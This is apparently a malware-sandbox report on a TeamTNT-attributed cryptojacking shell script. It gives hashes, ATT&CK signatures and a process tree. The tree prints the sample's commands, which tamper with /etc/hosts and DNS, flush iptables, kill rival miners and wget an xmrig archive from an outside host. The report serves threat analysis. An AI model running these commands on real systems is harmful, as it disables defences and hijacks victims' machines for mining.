Analysis
-
max time kernel
135s -
max time network
202s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
-
submitted
29-12-2024 23:10
General
-
Target
SugarLogic_#teamtnt_by_@r3dbU7z/Kubernetes_root_PayLoad_2.sh
-
Size
27KB
-
MD5
0da186f3e1f8c89c5fbe5672cbdf05b6
-
SHA1
a917ab4301ab25749d6e867a1812e61b3b09df3f
-
SHA256
f82ea98d1dc5d14817c80937b91b381e9cd29d82367a2dfbde60cfb073ea4316
-
SHA512
25c6afd296b855f8d230389479b95ac079b51a084b38ef7a9a2747024fae8d4441f45b2fb45071f59835868a3b31d7fab2549244be43a09942a5fc07240f7f1d
-
SSDEEP
384:ckWWRItydlaRM07lT2wDi/Y5vWCr7Q2K3v/lts1dIxRsnJEbOU89WV/:ckWcItYlaxlT2wDGWvWCrzPoRfOPO/
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 1 IoCs
-
Flushes firewall rules 1 TTPs 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
-
Modifies hosts file 1 IoCs
Adds to hosts file used for mapping hosts to IP addresses.
-
OS Credential Dumping 1 TTPs 1 IoCs
Adversaries may attempt to dump credentials to use it in password cracking.
-
Writes DNS configuration 1 TTPs 1 IoCs
Writes data to DNS resolver config file.
-
Deletes log files 1 TTPs 1 IoCs
Deletes log files on the system.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Write file to user bin folder 7 IoCs
-
Reads CPU attributes 1 TTPs 2 IoCs
-
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Process Discovery 1 TTPs 2 IoCs
Adversaries may try to discover information about running processes.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 35 IoCs
Malware often drops required files in the /tmp directory.
-
Software Deployment Tools 1 TTPs 4 IoCs
Use software deployment tools to execute code.
Processes
-
/tmp/SugarLogic_#teamtnt_by_@r3dbU7z/Kubernetes_root_PayLoad_2.sh"/tmp/SugarLogic_#teamtnt_by_@r3dbU7z/Kubernetes_root_PayLoad_2.sh"1⤵
- Modifies hosts file
- Writes DNS configuration
- Write file to user bin folder
- Writes file to tmp directory
-
/bin/unameuname -m2⤵
-
-
/bin/unameuname -m2⤵
-
-
/bin/unameuname -m2⤵
-
-
/bin/hostnamehostname2⤵
-
-
/bin/pidofpidof /usr/sbin/.configure/xmrig2⤵
- Reads runtime system information
-
-
/bin/grepgrep "45.9.148.108 chimaera.cc" /etc/hosts2⤵
-
-
/bin/grepgrep chimaera /etc/hosts2⤵
-
-
/bin/grepgrep "45.9.148.108 teamtnt.red" /etc/hosts2⤵
-
-
/bin/grepgrep teamtnt /etc/hosts2⤵
-
-
/bin/grepgrep "nameserver 8.8.8.8\\|nameserver 8.8.4.4" /etc/resolv.conf2⤵
-
-
/bin/grepgrep nameserver /etc/resolv.conf2⤵
-
-
/bin/sedsed -i /nameserver/d /etc/resolv.conf2⤵
- Reads runtime system information
-
-
/bin/grepgrep "nameserver 8.8.8.8" /etc/resolv.conf2⤵
-
-
/bin/grepgrep "nameserver 8.8.4.4" /etc/resolv.conf2⤵
-
-
/usr/bin/apt-getapt-get update --fix-missing2⤵
- Writes file to tmp directory
- Software Deployment Tools
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
-
-
/usr/lib/apt/methods/http/usr/lib/apt/methods/http3⤵
-
-
/usr/lib/apt/methods/https/usr/lib/apt/methods/https3⤵
-
-
/usr/lib/apt/methods/https/usr/lib/apt/methods/https3⤵
-
-
/usr/lib/apt/methods/http/usr/lib/apt/methods/http3⤵
-
-
/usr/lib/apt/methods/gpgv/usr/lib/apt/methods/gpgv3⤵
-
-
/usr/lib/apt/methods/gpgv/usr/lib/apt/methods/gpgv3⤵
- Writes file to tmp directory
-
/usr/bin/apt-key/usr/bin/apt-key --quiet --readonly verify --status-fd 3 /tmp/apt.sig.8vww38 /tmp/apt.data.VC6Uja4⤵
- Writes file to tmp directory
-
/usr/bin/apt-configapt-config shell MASTER_KEYRING APT::Key::MasterKeyring5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/apt-configapt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/apt-configapt-config shell REMOVED_KEYS APT::Key::RemovedKeys5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/apt-configapt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI5⤵
- Reads runtime system information
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/apt-configapt-config shell TRUSTEDFILE Apt::GPGV::TrustedKeyring5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/apt-configapt-config shell TRUSTEDFILE Dir::Etc::Trusted/f5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/apt-configapt-config shell GPGV Apt::Key::gpgvcommand5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/bin/mktempmktemp --directory --tmpdir apt-key-gpghome.XXXXXXXXXX5⤵
-
-
/bin/chmodchmod 700 /tmp/apt-key-gpghome.hlVmH4JXFO5⤵
-
-
/bin/readlinkreadlink -f /tmp/apt-key-gpghome.hlVmH4JXFO5⤵
-
-
/bin/rmrm -f /tmp/apt-key-gpghome.hlVmH4JXFO/pubring.gpg5⤵
-
-
/usr/bin/touchtouch /tmp/apt-key-gpghome.hlVmH4JXFO/pubring.gpg5⤵
- Writes file to tmp directory
-
-
/usr/bin/apt-configapt-config shell TRUSTEDPARTS Dir::Etc::TrustedParts/d5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/bin/readlinkreadlink -f /etc/apt/trusted.gpg.d/5⤵
-
-
/usr/bin/findfind /etc/apt/trusted.gpg.d -mindepth 1 -maxdepth 1 "(" -name "*.gpg" -o -name "*.asc" ")"5⤵
-
-
/usr/bin/sortsort5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-buster-automatic.gpg5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-buster-security-automatic.gpg5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-buster-stable.gpg5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-jessie-automatic.gpg5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-jessie-security-automatic.gpg5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-jessie-stable.gpg5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-stretch-automatic.gpg5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-stretch-security-automatic.gpg5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-stretch-stable.gpg5⤵
-
-
/bin/cpcp -a /tmp/apt-key-gpghome.hlVmH4JXFO/pubring.gpg /tmp/apt-key-gpghome.hlVmH4JXFO/pubring.orig.gpg5⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/sedsed -e "s#'#'\"'\"'#g"5⤵
-
-
/bin/sedsed -e "s#'#'\"'\"'#g"5⤵
-
-
/usr/bin/gpgvgpgv --homedir /tmp/apt-key-gpghome.hlVmH4JXFO --keyring /tmp/apt-key-gpghome.hlVmH4JXFO/pubring.gpg --ignore-time-conflict --status-fd 3 /tmp/apt.sig.8vww38 /tmp/apt.data.VC6Uja5⤵
-
-
/usr/bin/gpgconfgpgconf --kill gpg-agent5⤵
-
/usr/bin/gpg-connect-agentgpg-connect-agent --no-autostart KILLAGENT6⤵
-
-
-
/bin/rmrm -rf /tmp/apt-key-gpghome.hlVmH4JXFO5⤵
-
-
-
/usr/bin/apt-key/usr/bin/apt-key --quiet --readonly verify --status-fd 3 /var/lib/apt/lists/archive.debian.org_debian_dists_stretch_Release.gpg /var/lib/apt/lists/archive.debian.org_debian_dists_stretch_Release4⤵
- Writes file to tmp directory
-
/usr/bin/apt-configapt-config shell MASTER_KEYRING APT::Key::MasterKeyring5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/apt-configapt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring5⤵
- Reads runtime system information
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/apt-configapt-config shell REMOVED_KEYS APT::Key::RemovedKeys5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/apt-configapt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/apt-configapt-config shell TRUSTEDFILE Apt::GPGV::TrustedKeyring5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/apt-configapt-config shell TRUSTEDFILE Dir::Etc::Trusted/f5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/apt-configapt-config shell GPGV Apt::Key::gpgvcommand5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/bin/mktempmktemp --directory --tmpdir apt-key-gpghome.XXXXXXXXXX5⤵
-
-
/bin/chmodchmod 700 /tmp/apt-key-gpghome.UWBscyd6rj5⤵
-
-
/bin/readlinkreadlink -f /tmp/apt-key-gpghome.UWBscyd6rj5⤵
-
-
/bin/rmrm -f /tmp/apt-key-gpghome.UWBscyd6rj/pubring.gpg5⤵
-
-
/usr/bin/touchtouch /tmp/apt-key-gpghome.UWBscyd6rj/pubring.gpg5⤵
- Writes file to tmp directory
-
-
/usr/bin/apt-configapt-config shell TRUSTEDPARTS Dir::Etc::TrustedParts/d5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/bin/readlinkreadlink -f /etc/apt/trusted.gpg.d/5⤵
-
-
/usr/bin/findfind /etc/apt/trusted.gpg.d -mindepth 1 -maxdepth 1 "(" -name "*.gpg" -o -name "*.asc" ")"5⤵
-
-
/usr/bin/sortsort5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-buster-automatic.gpg5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-buster-security-automatic.gpg5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-buster-stable.gpg5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-jessie-automatic.gpg5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-jessie-security-automatic.gpg5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-jessie-stable.gpg5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-stretch-automatic.gpg5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-stretch-security-automatic.gpg5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-stretch-stable.gpg5⤵
-
-
/bin/cpcp -a /tmp/apt-key-gpghome.UWBscyd6rj/pubring.gpg /tmp/apt-key-gpghome.UWBscyd6rj/pubring.orig.gpg5⤵
- Writes file to tmp directory
-
-
/bin/sedsed -e "s#'#'\"'\"'#g"5⤵
-
-
/bin/sedsed -e "s#'#'\"'\"'#g"5⤵
-
-
/usr/bin/gpgvgpgv --homedir /tmp/apt-key-gpghome.UWBscyd6rj --keyring /tmp/apt-key-gpghome.UWBscyd6rj/pubring.gpg --ignore-time-conflict --status-fd 3 /var/lib/apt/lists/archive.debian.org_debian_dists_stretch_Release.gpg /var/lib/apt/lists/archive.debian.org_debian_dists_stretch_Release5⤵
-
-
/usr/bin/gpgconfgpgconf --kill gpg-agent5⤵
-
/usr/bin/gpg-connect-agentgpg-connect-agent --no-autostart KILLAGENT6⤵
-
-
-
/bin/rmrm -rf /tmp/apt-key-gpghome.UWBscyd6rj5⤵
-
-
-
/usr/bin/apt-key/usr/bin/apt-key --quiet --readonly --keyring /etc/apt/keyrings/nodesource.gpg verify --status-fd 3 /tmp/apt.sig.u88bkj /tmp/apt.data.oa4XOp4⤵
- Writes file to tmp directory
-
/usr/bin/apt-configapt-config shell MASTER_KEYRING APT::Key::MasterKeyring5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/apt-configapt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/apt-configapt-config shell REMOVED_KEYS APT::Key::RemovedKeys5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/apt-configapt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/apt-configapt-config shell GPGV Apt::Key::gpgvcommand5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/bin/mktempmktemp --directory --tmpdir apt-key-gpghome.XXXXXXXXXX5⤵
-
-
/bin/chmodchmod 700 /tmp/apt-key-gpghome.leHZNi4C8u5⤵
-
-
/bin/sedsed -e "s#'#'\"'\"'#g"5⤵
-
-
/bin/sedsed -e "s#'#'\"'\"'#g"5⤵
-
-
/usr/bin/gpgvgpgv --homedir /tmp/apt-key-gpghome.leHZNi4C8u --keyring /etc/apt/keyrings/nodesource.gpg --ignore-time-conflict --status-fd 3 /tmp/apt.sig.u88bkj /tmp/apt.data.oa4XOp5⤵
-
-
/usr/bin/gpgconfgpgconf --kill gpg-agent5⤵
-
/usr/bin/gpg-connect-agentgpg-connect-agent --no-autostart KILLAGENT6⤵
-
-
-
/bin/rmrm -rf /tmp/apt-key-gpghome.leHZNi4C8u5⤵
-
-
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
-
-
/usr/bin/apt-getapt-get install -y bc2⤵
- Deletes log files
- Reads runtime system information
- Writes file to tmp directory
- Software Deployment Tools
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
-
-
/usr/lib/apt/methods/http/usr/lib/apt/methods/http3⤵
-
-
/usr/lib/apt/methods/http/usr/lib/apt/methods/http3⤵
-
-
/bin/sh/bin/sh -c "/usr/sbin/dpkg-preconfigure --apt || true"3⤵
-
/usr/sbin/dpkg-preconfigure/usr/sbin/dpkg-preconfigure --apt4⤵
- OS Credential Dumping
-
/usr/local/sbin/localelocale charmap5⤵
-
-
/usr/local/bin/localelocale charmap5⤵
-
-
/usr/sbin/localelocale charmap5⤵
-
-
/usr/bin/localelocale charmap5⤵
-
-
/bin/shsh -c "stty -a 2>/dev/null"5⤵
-
/bin/sttystty -a6⤵
-
-
-
/bin/shsh -c "stty -a 2>/dev/null"5⤵
-
/bin/sttystty -a6⤵
-
-
-
/bin/shsh -c "stty -a 2>/dev/null"5⤵
-
/bin/sttystty -a6⤵
-
-
-
/bin/shsh -c "stty -a 2>/dev/null"5⤵
-
/bin/sttystty -a6⤵
-
-
-
/bin/shsh -c "stty -a 2>/dev/null"5⤵
-
/bin/sttystty -a6⤵
-
-
-
/bin/shsh -c "stty -a 2>/dev/null"5⤵
-
/bin/sttystty -a6⤵
-
-
-
-
-
/usr/bin/dpkg/usr/bin/dpkg --assert-multi-arch3⤵
-
-
/usr/bin/dpkg/usr/bin/dpkg --status-fd 14 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/bc_1.06.95-9+b3_mips.deb3⤵
- Write file to user bin folder
-
/usr/local/sbin/dpkg-splitdpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/bc_1.06.95-9+b3_mips.deb4⤵
- System Network Configuration Discovery
-
-
/usr/local/bin/dpkg-splitdpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/bc_1.06.95-9+b3_mips.deb4⤵
- System Network Configuration Discovery
-
-
/usr/sbin/dpkg-splitdpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/bc_1.06.95-9+b3_mips.deb4⤵
- System Network Configuration Discovery
-
-
/usr/bin/dpkg-splitdpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/bc_1.06.95-9+b3_mips.deb4⤵
- System Network Configuration Discovery
- Software Deployment Tools
-
-
/usr/local/sbin/dpkg-debdpkg-deb --control /var/cache/apt/archives/bc_1.06.95-9+b3_mips.deb /var/lib/dpkg/tmp.ci4⤵
-
-
/usr/local/bin/dpkg-debdpkg-deb --control /var/cache/apt/archives/bc_1.06.95-9+b3_mips.deb /var/lib/dpkg/tmp.ci4⤵
-
-
/usr/sbin/dpkg-debdpkg-deb --control /var/cache/apt/archives/bc_1.06.95-9+b3_mips.deb /var/lib/dpkg/tmp.ci4⤵
-
-
/usr/bin/dpkg-debdpkg-deb --control /var/cache/apt/archives/bc_1.06.95-9+b3_mips.deb /var/lib/dpkg/tmp.ci4⤵
-
/usr/local/sbin/tartar -x -f - "--warning=no-timestamp"5⤵
-
-
/usr/local/bin/tartar -x -f - "--warning=no-timestamp"5⤵
-
-
/usr/sbin/tartar -x -f - "--warning=no-timestamp"5⤵
-
-
/usr/bin/tartar -x -f - "--warning=no-timestamp"5⤵
-
-
/sbin/tartar -x -f - "--warning=no-timestamp"5⤵
-
-
/bin/tartar -x -f - "--warning=no-timestamp"5⤵
-
-
-
/usr/local/sbin/dpkg-debdpkg-deb --fsys-tarfile /var/cache/apt/archives/bc_1.06.95-9+b3_mips.deb4⤵
-
-
/usr/local/bin/dpkg-debdpkg-deb --fsys-tarfile /var/cache/apt/archives/bc_1.06.95-9+b3_mips.deb4⤵
-
-
/usr/sbin/dpkg-debdpkg-deb --fsys-tarfile /var/cache/apt/archives/bc_1.06.95-9+b3_mips.deb4⤵
-
-
/usr/bin/dpkg-debdpkg-deb --fsys-tarfile /var/cache/apt/archives/bc_1.06.95-9+b3_mips.deb4⤵
-
-
/usr/local/sbin/rmrm -rf -- /var/lib/dpkg/tmp.ci4⤵
-
-
/usr/local/bin/rmrm -rf -- /var/lib/dpkg/tmp.ci4⤵
-
-
/usr/sbin/rmrm -rf -- /var/lib/dpkg/tmp.ci4⤵
-
-
/usr/bin/rmrm -rf -- /var/lib/dpkg/tmp.ci4⤵
-
-
/sbin/rmrm -rf -- /var/lib/dpkg/tmp.ci4⤵
-
-
/bin/rmrm -rf -- /var/lib/dpkg/tmp.ci4⤵
-
-
-
/usr/bin/dpkg/usr/bin/dpkg --status-fd 14 --configure --pending3⤵
- Software Deployment Tools
-
/var/lib/dpkg/info/bc.postinst/var/lib/dpkg/info/bc.postinst configure4⤵
- Executes dropped EXE
-
/usr/bin/whichwhich update-menus5⤵
-
-
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
-
-
-
/bin/cpcp /usr/bin/curl /usr/sbin/C_hg_curl2⤵
- Write file to user bin folder
-
-
/bin/chmodchmod +x /usr/sbin/C_hg_curl2⤵
- File and Directory Permissions Modification
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
-
-
/bin/grepgrep -i "[a]liyun"2⤵
-
-
/bin/grepgrep -i "[y]unjing"2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
-
-
/bin/mkdirmkdir -p /usr/sbin/.configure/2⤵
-
-
/bin/systemctlsystemctl stop account_daemons.service2⤵
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl stop moneroocean_miner.service2⤵
- Enumerates kernel/hardware configuration
-
-
/usr/bin/killallkillall -9 xmrig2⤵
- Reads runtime system information
-
-
/usr/bin/killallkillall -9 xmrigMiner2⤵
- Reads runtime system information
-
-
/bin/rmrm -rf /usr/sbin/moneroocean/2⤵
-
-
/bin/rmrm -rf /usr/bin/moneroocean/2⤵
-
-
/bin/rmrm -rf /usr/sbin/moneroocean/2⤵
-
-
/usr/bin/nprocnproc2⤵
-
-
/bin/sleepsleep 22⤵
-
-
/bin/rmrm -f "/usr/sbin/.configure/*.json"2⤵
-
-
/bin/catcat2⤵
-
-
/bin/sedsed -r "s/[^a-zA-Z0-9\\-]+/_/g"2⤵
-
-
/bin/hostnamehostname2⤵
-
-
/usr/bin/cutcut -f1 -d.2⤵
-
-
/bin/sedsed -i "s/\"pass\": *\"[^\"]*\",/\"pass\": \"debian9-mipsbe-20240611-en-7\",/" /usr/sbin/.configure/config.json2⤵
- Write file to user bin folder
- System Network Configuration Discovery
-
-
/bin/cpcp /usr/sbin/.configure/config.json /usr/sbin/.configure/config_background.json2⤵
- Write file to user bin folder
-
-
/bin/sedsed -i "s/\"background\": *false,/\"background\": true,/" /usr/sbin/.configure/config_background.json2⤵
- Write file to user bin folder
-
-
/usr/bin/wgetwget -q http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/.../xmr/kuben3/i386.tar.gz -O /usr/sbin/.configure/xmrig.tar.gz2⤵
- Write file to user bin folder
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Disable or Modify System Firewall
1Indicator Removal
1Clear Linux or Mac System Logs
1Credential Access
Adversary-in-the-Middle
1OS Credential Dumping
1/etc/passwd and /etc/shadow
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19B
MD5fe0b86955e4eb444f17f54d086580b1f
SHA1e19182dd3a1465bda3aa2e1a63067bec82dd5ad3
SHA256be102039b1dc4747490c6994ca8dc17d12d32219561f8ba23e8c0b865ac223ed
SHA5126e03176e423005c87c6c7b2ec4e90c46639d4311839a980317102a10445bc563e1c9e288605d6d5b18fadd32563c4c0ae2284f6016a54c81e5a97fa7c3cd5a26
-
Filesize
38B
MD5c7ea09d26e26605227076e0514a33038
SHA1c3f9736e9af7bd0885578859a50b205c8fa5fc8e
SHA2567e8ad76e0d200e93918ca2e93c99ff8ecd02071953bf1479819db3ac0dbb6d07
SHA51217d0088725eb9991e9eb82e8a3de0878e45e6f394bbc2ad260aa59c786ff0ad565e145e21256425d1c0abe15f3ecb402ebb0a6a5e1c2d5ba7a4d95ec93a2861f
-
Filesize
82B
MD555f13f39a483c125f00be6a83538b287
SHA1dfe8589b606ec4359746080b5a55a7282054d2d4
SHA256dc590de88ba153a167ea7015cd5ef514c9c3b39cad5768a9aef5505827c89425
SHA512cb416db33b18ec31248e8dfcdd702e69dae3617a044dc0e6bd6b8e7228930a0ae75a7b94e7aedbe13bf01d862b610c73b011709c0ce733edcf3629fac57cac1d
-
Filesize
82B
MD50a4d9457215aeb0c70ad305dcb93244f
SHA11c77d539747da844f28e0a347a3f4ed75b652667
SHA2569a10663c2bba875bd15a7215b77435878169e721ffec9882836d3052f50314a1
SHA5123b7ea9b4398f887eed021f0fda5835ac8f895cbf60cf3d8305c982ffdace227aa049925d8c3f24cb07f9e9b375bf58dacd695563d8a6cf3cc02d79640cac3ebf
-
Filesize
7KB
MD5b53e6ca4ed295fc38621315853f623d0
SHA145a416f014809735ec88854a3540c8e9e89eb102
SHA2566246307cc0130f6bd52510a477960f7c7be431b25979d7e20a88dc2fac58ac93
SHA51230b5d2571840c2319a4af3907afda8ab00cf2879c83aaee1048ca972c0d3ddbf7995a167a31b19c45195b636ab46e73b0534459c6ee79c557fac8bfc01d857ac
-
Filesize
15KB
MD52713b38b3d7345961d8b80f4463483b8
SHA1e6ec76aaebfea6a82f7984b57e07522a20365201
SHA256389d00b5cbd2f69f32065448000a0607aec056e39af958f62e89c4c7e6228248
SHA512ecee7b3045f49f7fa7443a8658602817bb2c8d2d07ae930536e3f2daaa5854903bf339af6c2fd4b02f8627f050ce360d2feddcf40569b58d304cfc459f418978
-
Filesize
18KB
MD5760d3ab91f417958475b9a6342a5b92e
SHA1137a06aea4b5c9e9ca11f0f5f1225da1c275c334
SHA25642b348802c4290af6f9f30f984513f22fdd342ac3561ccb82957561a6b7c291f
SHA5126cefcfae1c95c94b66b46d9242e62ddf7d7c65bd8d9bc9dc4e4c6230443ba33668ed160e1882f48a0b5daf59a46ccca09240ebe666017f059bd55e02fb1f2db6
-
Filesize
23KB
MD5d63fbab9dfb826d53f7b3aaea45dbfb5
SHA159841d8e5423f788292af76d4350a948f4e25f53
SHA256de329f1f48b751a7527f8ce3150452a4282ce69990e9318ab82d5b46b9f751ca
SHA51220118f98c87eb60f0abafd5b4c2ffb4b1faf92777ee7402b98c0f5dc42d492c83f94d6903bdeee006187ac344a57afeaa84b54a973b483ff13e49773071d8198
-
Filesize
47KB
MD5a4dc094481f22304cab5550218e6e4de
SHA1f5886a324c0c026d0168656f23d1d898a0e43bd6
SHA256eef8c4d7d518a986e4f1cfeec729b55369b863ed6b62a23cbe9d88aa56de5391
SHA5120f040c957db3d500ba18315db33cca6eb18f9c80d952710f839833a73dd89b72e2e01178084c17348e312a427a6b9150937199b4912e71dfd1a7e2dd43723f68
-
Filesize
71B
MD54a502d34c9274bf20ac5781ec24f97d5
SHA1524c16347caa1e4e4c89fe3a397248a4059be41c
SHA25611f70f1f445376846199cd886a909f58a5eca110d2539720b1b938410836514d
SHA51293ef1e10a3d08717b72b129dced28bd24adf1f94b86631b53ab15b5156b0c1b692962ce29c53f3ce9ef08b42a12db213927f1b1bca4a3f534de8f3ea7441a1bf
-
Filesize
7KB
MD566dfae0d73c713829368621455cd976c
SHA1317cf182a3b156474cfcb5568c1bbceed742020c
SHA2563ac7fc1f4870f170bedebef8da4fb3b256a1e2a5456ae88e7dd53f4e657c189e
SHA5124b50e1a402947ea56d7e7a485261f61ba0cf9c53d6c01c554c466be1c3b512486759c4ad3470e51afe24eb05c9b1c755ff38e42886fa2d87dc3aa08971d01f2c
-
Filesize
56KB
MD5fd96c8ce5d0ef18d63bbe9ae17bb2659
SHA176b284743d95d3546df9d85c09712c830a30f614
SHA256ffc8a7a283b61633aac383ddf8f863df3f39ef241a07a4127f51a2495ef674b3
SHA5122486acdfc102f8f8498d8db2f205915115444dd118507369044202dc9a97109b4c738a2faf16c1f5ce5e4452ae0af17ae4691ac3bf5e7c5e2db271c0f40a4cb2
-
Filesize
1KB
MD570274ce622b0cc437ef7f0caddc9d232
SHA1124513a3ad2eb5aafa9be0920681e3bb8625979b
SHA2564055d2ccc7c4be062ed390944548206ece5ed7613eae114b9e53ef15f3905230
SHA512fed0054da258bb4a99e8adac359322d9ecc67caeee872309ea7d9863db6a1ec2a55497100e31538f42b43b9efc997e779e3774c8a0c6b0206254d7252d8699c8
-
Filesize
4KB
MD5ca530ff912cb1a57246c9b11a6db5dbe
SHA167fe585886fcbf5169cb1fa56f85864edc5e9f14
SHA2560db9d6dbd1c03ad2ab7b41adaabd82919dc829a28f444e9ec68173e83d4c6aa7
SHA5126c85b33f1dcb1abec7e7121f3ac45d6dd6dd75ed03f6bed956545d7e1feb9512766efee27d1015fa27d013fa73e0521d76f79b972b9d8b630ff26172609b1038
-
Filesize
4KB
MD56f5f12b9aab59646024a835c4d3b2941
SHA197d382bdeb13751bbff42442ae51413e4462499e
SHA2560292179b087ca3a9d7c5d05353692be8521dafd06f8d1e4826c10c00c56c4a2d
SHA512eb4d87fe4674942e7ec57249a0c4009f545a307258de73cd628974b6995c7393a99615b0caca20f44af731a9c63e78ffcc029eb1b37b59d1a5359d40c3681850
-
Filesize
186KB
MD5e045e492b033a4f0e2168aaa509f5fd5
SHA14e2b28d07da66205e6a5875a3579f4c2bd18d4cc
SHA256226c62fcbf25743a88180b10072e6b3c96dc6b08559a96ea0a67cdb94b3d15ca
SHA51222dce34af0f4270709c72d8a7557f15939a72ab73d574f4bb8f295ca7e1907e3a42846a31092c34a147c58aa1a2dd05bb2d0656bdcffbc8a5ee5b6d9e82b0074
-
Filesize
102KB
MD592471af3fa1c3d5fdecfb4e306a5af71
SHA14a0f1cd7d405d3a64400d41ff2f481f7ade29808
SHA2569f428b848bd5204206d360ee5a8e7ed75ab1d2ae39d40de587a636bf9d624eb2
SHA5128e462cc3520f818a6ce27635a45338781d20cf7a4d1daf3776992f00eed86c16d100ff71f5068d105e1ef09f30b79d29cc509dfca72690469d906f21069cd382
-
Filesize
666B
MD5c23bf14b496a8508af0483ba9455e9dd
SHA19bc54aeda19865348b988ba80881664c5e389fc9
SHA2561712db020f487fe2c6b2b0bc5518fb8480b090ac3862539d5a5d62511426728f
SHA512c14c255bd287a2cb6899db8af4784ed6a3b39a3da03fb213af401d43f3578f629d76248d87f05c654efccff6a84038a06ca5611a5fec8b13d5e5330a7bf0806e
-
